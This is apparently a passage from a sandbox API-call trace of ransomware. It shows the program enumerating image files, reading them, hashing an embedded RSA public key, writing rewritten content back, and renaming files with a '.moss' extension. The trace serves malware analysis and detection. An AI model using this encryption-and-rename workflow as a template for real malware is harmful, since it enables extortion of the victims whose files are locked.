lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e028 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b50f68 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0171.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0171.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.873] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0xaed8, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0xaed8, lpOverlapped=0x0) returned 1 [0171.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0171.873] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xaedd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.873] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0171.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0171.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0171.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0171.874] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0171.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0171.874] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0171.874] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0171.874] CloseHandle (hObject=0x664) returned 1 [0171.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0171.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0171.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0171.876] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\1dxa4BK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\1dxa4bk.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\1dxa4BK.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\1dxa4bk.jpg.moss")) returned 1 [0171.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.877] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.878] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3910f380, ftCreationTime.dwHighDateTime=0x1d5dc34, ftLastAccessTime.dwLowDateTime=0x501bb480, ftLastAccessTime.dwHighDateTime=0x1d5dd9b, ftLastWriteTime.dwLowDateTime=0x501bb480, ftLastWriteTime.dwHighDateTime=0x1d5dd9b, nFileSizeHigh=0x0, nFileSizeLow=0xc11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7tUnNPl.png", cAlternateFileName="")) returned 1 [0171.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0171.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\7tUnNPl.png") returned=".png" [0171.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\7tUnNPl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\7tunnpl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.878] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=3089) returned 1 [0171.878] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.881] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xbeb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.881] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.882] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.882] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc11, lpOverlapped=0x0) returned 1 [0171.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.883] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.884] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.884] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.884] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.884] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.884] GetLastError () returned 0x0 [0171.884] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.884] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.884] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.884] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.884] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc10) returned 0x3b4b098 [0171.885] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50f68 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e028 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50fb0 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e040 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e070 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e088 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.885] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e070 | out: hHeap=0xcd0000) returned 1 [0171.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e088 | out: hHeap=0xcd0000) returned 1 [0171.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e088 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e070 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa27b8 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e088 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e070 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.886] GetCurrentThreadId () returned 0x324 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4fa18 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.886] GetCurrentThreadId () returned 0x324 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0171.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e070 [0171.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0171.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e088 [0171.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0171.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0171.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e058 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e0a0 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e070 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e070 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa27b8 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0171.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa2588 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.889] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e070 | out: hHeap=0xcd0000) returned 1 [0171.889] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0171.889] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 